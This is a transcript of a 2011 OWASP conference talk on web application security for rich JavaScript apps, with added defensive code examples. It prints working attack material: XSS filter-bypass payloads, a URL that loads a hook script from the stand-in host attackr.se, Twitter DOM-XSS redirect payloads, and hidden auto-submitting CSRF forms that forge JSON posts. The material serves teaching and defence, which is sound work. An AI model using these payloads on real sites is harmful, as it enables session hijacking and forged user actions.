Application Security for RIAs

In this session, you’ll learn about the top 10 security risks in web applications, and, with demos, how REST backends and rich JavaScript applications map to these risks. Current and upcoming countermeasures include new HTTP headers, double submit cookies, and escaping input client-side to avoid DOM-based XSS. We’ll look at each of these, discuss the techniques you’ll want to add to your developer toolbox, and how to build reasonable security processes into an agile team environment.

Published in: Technology
Transcript of "Application Security for RIAs"

  1. Application Security for RIAs. John Wilander & OWASP. Wednesday, November 2, 2011
  2. Frontend developer at Svenska Handelsbanken. Researcher in application security. Co-leader OWASP Sweden. @johnwilander, johnwilander.com (music). OWASP == The Open Web Application Security Project: cheat sheets, tools, code, guidelines. https://owasp.org
  3. ÅåÄäÖö
  4. OWASP Top 10: top web application security risks 2010
  5. 1. Injection; 2. Cross-Site Scripting (XSS); 3. Broken Authentication and Session Management; 4. Insecure Direct Object References; 5. Cross-Site Request Forgery (CSRF); 6. Security Misconfiguration; 7. Insecure Cryptographic Storage; 8. Failure to Restrict URL Access; 9. Insufficient Transport Layer Protection; 10. Unvalidated Redirects and Forwards
  6. ”Do I have to care?”
  7. Likelihood of ≥ 1 vulnerability on your site. From: WhiteHat Website Security Statistic Report, Winter 2011
  8. Per extension. From: WhiteHat Website Security Statistic Report, Spring 2010
                                                         .asp   .aspx  .do    .jsp   .php
     Sites having had ≥ 1 serious vulnerability           74 %   73 %   77 %   80 %   80 %
     Sites currently having ≥ 1 serious vulnerability     57 %   58 %   56 %   59 %   63 %
  9. But we’re moving towards more code client-side
  10-11. Client-side, JavaScript vulnerabilities. From: IBM X-Force 2011 Mid-Year Trend and Risk Report
  12. Focus today: • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF) • Clickjacking • Man-In-the-Middle SSL
  13. XSS ... the hack that keeps on hacking
  14. Cross-Site Scripting: theory (diagram; label: Cross-Site Scripting)
  15. Cross-Site Scripting, type 1, reflected (diagram; labels: Cross-Site Scripting, Phishing)
  16-17. Cross-Site Scripting, type 2, stored (diagram; label: Cross-Site Scripting)
  18. Cross-Site Scripting, type 0, DOM-based (diagram; labels: Cross-Site Scripting, Phishing)
  19. Cross-Site Scripting, type 0, DOM-based: no server roundtrip! Also, single-page interfaces make injected scripts ”stick” in the DOM.
  20-21. https://secure.bank.com/authentication#language=sv&country=SE. The fragment is never sent to the server. Be careful when you use this data on your page.
  22. Would you click this? https://secure.bank.com/authentication#language=<script src="http://attackr.se:3000/hook.js"></script>&country=SE
  23. Would you click this? https://secure.bank.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&country=SE
  24. Would you click this? http://bit.ly/Yg4T32
  25. Filter out <script>? Ext.util.Format.stripScripts, http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts:
         var ... ,
             stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig,
         /**
          * Strips all script tags
          * @param {Object} value The text from which to strip script tags
          * @return {String} The stripped text
          */
         stripScripts : function(v) {
             return !v ? v : String(v).replace(stripScriptsRe, "");
         },
  26. Filter out <script>? Payloads that get past a <script>-tag filter:
         <img src=1 onerror=alert(1)>
         <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
         <body onload=alert(XSS)>
         <table background="javascript:alert(XSS)">
         ¼script¾alert(¢XSS¢)¼/script¾
         <video poster=javascript:alert(1)//
  27. ”C’mon, such attacks don’t really work, do they?” Yep, demo.
  28. DOM-based XSS, Twitter, September 2010. Full story at http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
  29-33. Twitter’s code. What does it do?
         (function(g){
           var a = location.href.split("#!")[1];
           if(a) {
             g.location = a;
           }
         })(window);
         "https://twitter.com/#!/johnwilander".split("#!")[1] returns "/johnwilander", so window.location = "/johnwilander"; the initial ’/’ keeps the domain but changes the path. So twitter.com/#!/johnwilander becomes twitter.com/johnwilander. Read more: http://kotowicz.net/absolute/
  34-35. http://twitter.com/#!javascript:alert(document.domain); Never sent to server => DOM-based XSS
  36-37. The Patch™
         var c = location.href.split("#!")[1];
         if (c) {
           window.location = c.replace(":", "");
         } else {
           return true;
         }
         replace() with a string pattern replaces only the first occurrence of the search string.
  38-39. http://twitter.com/#!javascript::alert(document.domain);
  40-43. The 2nd Patch™
         (function(g){
           var a = location.href.split("#!")[1];
           if(a) {
             g.location = a.replace(/:/gi,"");
           }
         })(window);
         /:/gi: regexp pattern delimiters, global match, ignore case
  44. Were they done now?
  45-46. http://twitter.com#!javascript&x58;alert(1) (HTML entity version of ’:’)
  47. The n:th Patch™ (this one works)
         (function(g){
           var a = location.href.split("#!")[1];
           if(a) {
             g.location.pathname = a;
           }
         })(window);
         And hey, Twitter is doing the right thing: https://twitter.com/about/security
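The lesson of slides 29-47 as an added example (not Twitter’s code): instead of filtering characters out of the fragment, accept only values that look like a path on this origin and assign them to location.pathname, which cannot change scheme or host. The two string-filtering patches are kept as functions only to show the failure mode the slides describe; the allow-list regex and function names are this example’s own.

```javascript
// Added example, not Twitter's code: the "#!" redirect as a same-origin path
// assignment with an allow-list check, beside the two string-filtering patches
// from the slides. Pure functions over the URL string, so it runs without a DOM.

// What the first patch did: a string pattern replaces only the FIRST match.
function firstPatch(fragment) {
  return fragment.replace(":", "");
}

// What the second patch did: every ':' goes, but a filter that removes one
// character still lets the fragment pick the scheme in any other spelling.
function secondPatch(fragment) {
  return fragment.replace(/:/gi, "");
}

// The text after "#!" in a URL, or null when there is no hash-bang at all.
function hashBangFragment(href) {
  const idx = href.indexOf("#!");
  return idx === -1 ? null : href.slice(idx + 2);
}

// Allow-list for a path on THIS origin: must start with a single '/', and may
// then contain only unreserved path characters. No scheme, no "//" authority,
// no '&', '%' or ';', so entity or percent spellings of ':' cannot slip in.
const SAME_ORIGIN_PATH = /^\/(?!\/)[A-Za-z0-9_\-.\/~]*$/;

// Returns the path to navigate to, or null if the fragment is not acceptable.
// Rejecting is the point: a rejected value is dropped, not "cleaned up".
function safeRedirectPath(href) {
  const fragment = hashBangFragment(href);
  if (fragment === null) return null;
  let decoded;
  try {
    decoded = decodeURIComponent(fragment); // one decode, as the browser would
  } catch (e) {
    return null; // malformed %xx sequence
  }
  return SAME_ORIGIN_PATH.test(decoded) ? decoded : null;
}

// Browser glue: assigning location.pathname (as the n:th patch does) can only
// change the path, never the scheme or host, so the origin is kept by construction.
function applyHashBangRedirect(g) {
  const path = safeRedirectPath(g.location.href);
  if (path !== null) {
    g.location.pathname = path;
  }
}

if (typeof window !== "undefined") {
  applyHashBangRedirect(window);
}
```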
  48. Fix these issues properly with ... client-side encoding
  49-50. https://github.com/chrisisbeef/jquery-encoder
         • $.encoder.canonicalize(): throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>
         • $.encoder.encodeForCSS(): encodes for safe usage in style attribute and style()
         • $.encoder.encodeForHTML(): encodes for safe usage in innerHTML and html()
         • $.encoder.encodeForHTMLAttribute(): encodes for safe usage in HTML attributes
         • $.encoder.encodeForJavaScript(): encodes for safe usage in event handlers etc
         • $.encoder.encodeForURL(): encodes for safe usage in href etc
  51. Let’s do a short demo of that
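An added example of what slides 48-51 demonstrate, written in plain JavaScript rather than with jquery-encoder (this is not the plugin’s code): the bank URL’s fragment parameters (#language=sv&country=SE) are canonicalized once, double encoding is refused, and each value is encoded for the context it lands in. The function names and the language-banner markup are assumptions made for the example.

```javascript
// Added example, not jquery-encoder's code: fragment parameters parsed with a
// canonicalize step and rendered with context-specific encoders, so a hostile
// fragment becomes inert text instead of markup.

// Decode once; refuse values that are still encoded after one decode (double
// encoding) and values with malformed %xx sequences, like $.encoder.canonicalize().
function canonicalize(s) {
  let once;
  try {
    once = decodeURIComponent(s);
  } catch (e) {
    throw new Error("malformed percent-encoding");
  }
  let twice;
  try {
    twice = decodeURIComponent(once);
  } catch (e) {
    twice = once; // a bare '%' left after one decode is literal, not an encoding
  }
  if (twice !== once) throw new Error("double encoding detected");
  return once;
}

// HTML body context: the characters that can open a tag, an entity or a quote.
function encodeForHTML(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// HTML attribute context: everything except alphanumerics as a numeric entity,
// so the value cannot close the attribute whichever quote character was used.
function encodeForHTMLAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => "&#x" + c.codePointAt(0).toString(16) + ";");
}

// Parse "#language=sv&country=SE" into an object. The hash never reaches the
// server, so this is the only place the data gets checked.
function parseFragmentParams(href) {
  const hash = href.indexOf("#");
  const params = {};
  if (hash === -1) return params;
  for (const pair of href.slice(hash + 1).split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const key = canonicalize(eq === -1 ? pair : pair.slice(0, eq));
    const value = canonicalize(eq === -1 ? "" : pair.slice(eq + 1));
    params[key] = value;
  }
  return params;
}

// Build the markup for a language banner; each value is encoded for the exact
// context it lands in (attribute value vs. element text).
function renderLanguageBanner(href) {
  const p = parseFragmentParams(href);
  const language = p.language || "en";
  const country = p.country || "";
  return '<span lang="' + encodeForHTMLAttribute(language) + '">' +
    encodeForHTML("Language: " + language + ", country: " + country) + "</span>";
}
```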
  52. Also, check out ... Content Security Policy: http://people.mozilla.com/~bsterne/content-security-policy/
  53. A new HTTP response header saying: only allow scripts from whitelisted domains, and only allow scripts from files, i.e. no inline scripts
  54. self = same URL, protocol and port.
         X-Content-Security-Policy: default-src self
         Accept all content including scripts only from my own URL+port.
         X-Content-Security-Policy: default-src *; script-src trustedscripts.foo.com
         Accept media only from my URL+port (images, stylesheets, fonts, ...) and scripts only from trustedscripts.foo.com
  55. CSRF, my current favorite!
  56-57. Cross-Site Request Forgery (diagram; labels: Cross-Site Request Forgery, Phishing)
  58. Is www.attackr.se allowed to load images like this: <img src="https://secure.bank.com/logo.png" /> ?
  59. Is www.attackr.se allowed to load images like this: <img src="https://secure.bank.com/authentication#language=sv&country=SE" /> ?
  60. With image tags www.attackr.se can silently send HTTP GET requests to any domain: <img src="https://secure.bank.com/authentication#language=sv&country=SE" height=0 width=0 />
  61. ”Will restricting to HTTP POST save me?”
  62-68. Two browser windows, each with a ”What’s on your mind?” box and a POST button. John types ”I love OWASP!” in the first and posts; the site shows ”John: I love OWASP!”. Then the second window posts ”I hate OWASP!” and the site shows ”John: I hate OWASP!”.
  69-70. The second window did it with an auto-submitting form:
         <form id="target" method="POST" action="https://1-liner.org/form">
           <input type="text" value="I hate OWASP!" name="oneLiner"/>
           <input type="submit" value="POST"/>
         </form>
         <script type="text/javascript">
           $(document).ready(function() {
             $("#target").submit();
           });
         </script>
  71. There used to be a protection in web 1.5
  72-76. Forced browsing, wizard-style: Shipment info ✉, Payment info $, Next, Buy!, with a token per step (Token 1, Token 2, Token 3). State built up in steps, server roundtrip in-between. Couldn’t forge a request to the last step without a valid token.
  77. But in RIAs ...
  78-83. RIA & client-side state: the purchase object is built up step by step in the client:
         {
           "purchase": {
             "items": [{},{}],
             "shipment": {},
             "payment": {}
           }
         }
  84. Can an attacker forge such a JSON structure?
  85. CSRF possible?
  86-91. Start from a plain form, hide it, and set enctype to text/plain:
         <form id="target" method="POST" action="https://vulnerable.1-liner.org:8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">
           <input type="text" name="" value="" />
           <input type="submit" value="Go" />
         </form>
         Forms produce a request body that looks like this: theName=theValue ... and that’s not valid JSON. But with the JSON in the name attribute, ending in a comment marker:
         <form id="target" method="POST" action="https://vulnerable.1-liner.org:8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">
           <input type="text" name={"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}// value="dummy" />
           <input type="submit" value="Go" />
         </form>
         Produces a request body that looks like this:
         {"id": 0, "nickName": "John","oneLiner": "I hate OWASP!","timestamp": "20111006"}//=dummy
         ... and that is acceptable JSON!
  92. Demo: POST CSRF against REST service
  93. Demo: XSS + CSRF with The Browser Exploitation Framework, http://beefproject.com/
  94. Important in your REST API:
         • Restrict HTTP method, e.g. POST. Easier to do CSRF with GET.
         • Restrict to AJAX if applicable: X-Requested-With: XMLHttpRequest. Cross-domain AJAX prohibited by default.
         • Restrict media type(s), e.g. application/json. HTML forms only allow URL encoded, multi-part and text/plain.
  95. Attacker may spoof headers via Flash proxy: http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-February/007533.html
  96-97. Double Submit (CSRF protection): anti-CSRF value as cookie ... and as request parameter
  98. Double Submit (CSRF protection): cookie ≠ request parameter. The attacker cannot read the anti-CSRF cookie to include it as parameter.
  99. Double Submit (CSRF protection): the anti-CSRF cookie can be generated client-side => no server-side state
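The three REST API checks from slide 94, the header-spoofing caveat from slide 95 and the double-submit comparison from slides 96-99, as one added example (not the talk’s demo service): a pure function over a request object that reports every failed check. The cookie name "anti-csrf", the header "X-Anti-CSRF" and the sample requests are constructed for this example.

```javascript
// Added example, not the talk's demo service: the REST API checks from the
// slides (method, X-Requested-With, media type) plus the double-submit
// comparison, as one pure function over a request object. Cookie name
// "anti-csrf" and header "X-Anti-CSRF" are assumed names, not from the slides.

// Case-insensitive header lookup; "" when absent.
function header(req, name) {
  const want = name.toLowerCase();
  for (const k of Object.keys(req.headers)) {
    if (k.toLowerCase() === want) return req.headers[k];
  }
  return "";
}

function parseCookies(cookieHeader) {
  const out = {};
  for (const part of cookieHeader.split(";")) {
    const eq = part.indexOf("=");
    if (eq === -1) continue;
    out[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return out;
}

// Compare without an early exit on the first differing character.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Returns { ok, reasons }; reasons lists every failed check so a rejected
// request can be logged with the exact cause.
function csrfCheck(req) {
  const reasons = [];
  if (req.method !== "POST") reasons.push("method");
  if (header(req, "X-Requested-With") !== "XMLHttpRequest") reasons.push("x-requested-with");
  const mediaType = header(req, "Content-Type").split(";")[0].trim().toLowerCase();
  if (mediaType !== "application/json") reasons.push("content-type");
  // Double submit: the browser attaches the cookie to any request for the site,
  // but only same-origin script can read it and copy it into the request.
  const cookieToken = parseCookies(header(req, "Cookie"))["anti-csrf"] || "";
  const paramToken = header(req, "X-Anti-CSRF");
  if (cookieToken.length < 32 || !constantTimeEqual(cookieToken, paramToken)) reasons.push("double-submit");
  return { ok: reasons.length === 0, reasons };
}

// Token minted client-side, no server state: hex of random bytes supplied by
// the caller (in a browser: crypto.getRandomValues(new Uint8Array(16))).
function newAntiCsrfToken(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");
}

// --- constructed sample requests (not captured traffic) ---
const TOKEN = newAntiCsrfToken([0x7f, 0x3a, 0x91, 0x04, 0xde, 0xad, 0xbe, 0xef,
                                0x10, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88]);

// The hidden text/plain form from the slides, submitted from www.attackr.se: the
// browser attaches the cookie, but the page can neither read it nor set headers.
const FORGED_FORM = {
  method: "POST",
  headers: { "Content-Type": "text/plain", "Cookie": "JSESSIONID=abc123; anti-csrf=" + TOKEN },
  body: '{"id": 0, "nickName": "John","oneLiner": "I hate OWASP!","timestamp": "20111006"}//=dummy',
};

// A genuine call from the RIA's own JavaScript, which can read the cookie.
const RIA_AJAX = {
  method: "POST",
  headers: { "Content-Type": "application/json; charset=UTF-8", "X-Requested-With": "XMLHttpRequest",
             "Cookie": "JSESSIONID=abc123; anti-csrf=" + TOKEN, "X-Anti-CSRF": TOKEN },
  body: '{"id": 0, "nickName": "John", "oneLiner": "I love OWASP!", "timestamp": "20111006"}',
};

// Header spoofing (slide 95): method, X-Requested-With and media type all look
// right, but the token value is a guess because the cookie was never readable.
const SPOOFED_HEADERS = {
  method: "POST",
  headers: { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest",
             "Cookie": "JSESSIONID=abc123; anti-csrf=" + TOKEN, "X-Anti-CSRF": "0".repeat(32) },
  body: RIA_AJAX.body,
};
```

Only the double-submit line rejects the spoofed-headers request, which is why the token comparison, not the header checks, carries the defence.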
  100. How To Get It Right
         • Join your local OWASP chapter: https://www.owasp.org/index.php/OWASP_Chapter
         • Start following these fellas on Twitter: @WisecWisec @0x6D6172696F @garethheyes @internot_ @securityninja @jeremiahg @kkotowicz @webtonull @manicode @_mwc
         • Start hacking – it’s fun! Best place to start? Your own apps of course. Just stay legal ;)
  101. @johnwilander, john.wilander@owasp.org, http://appsandsecurity.blogspot.com
  102. Clickjacking and MItM, if there’s time
  103. Clickjacking demo
  104. X-Frame-Options: http://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-clickjacking-defenses.aspx and http://tools.ietf.org/html/draft-gondrom-frame-options-01
  105. ”No page can load me in an iframe” or ”only my own domain can load me in an iframe”
  106. X-Frame-Options: DENY / X-Frame-Options: SAMEORIGIN (Coming: X-Frame-Options: ALLOW-FROM [list])
  107. MItM demo
  108. Moxie’s SSL Strip (diagram: http on the client side, https on the server side). Terminates SSL. Normal https to the server. Changes https to http. Acts as client.
  109-110. Moxie’s SSL Strip. Secure cookie? Strip secure attribute off all cookies. Encoding, gzip? Strip off all request encodings. Cached content? Strip off all if-modified-since in request. Ongoing sessions? 302 back to same page, set-cookie expired.
  111. SSL Strip & Tor: in 24 h on a Tor exit node running SSL Strip: login.yahoo.com 114, Gmail 50, Hotmail 13, PayPal 9
  112. HTTP Strict Transport Security: http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-02
  113. Require SSL without warnings for X seconds ahead, and potentially do the same for my subdomains too
  114. Strict-Transport-Security: max-age=86400 / Strict-Transport-Security: max-age=86400; includeSubdomains
  115. W3C Web Application Security Working Group: http://www.w3.org/2011/webappsec/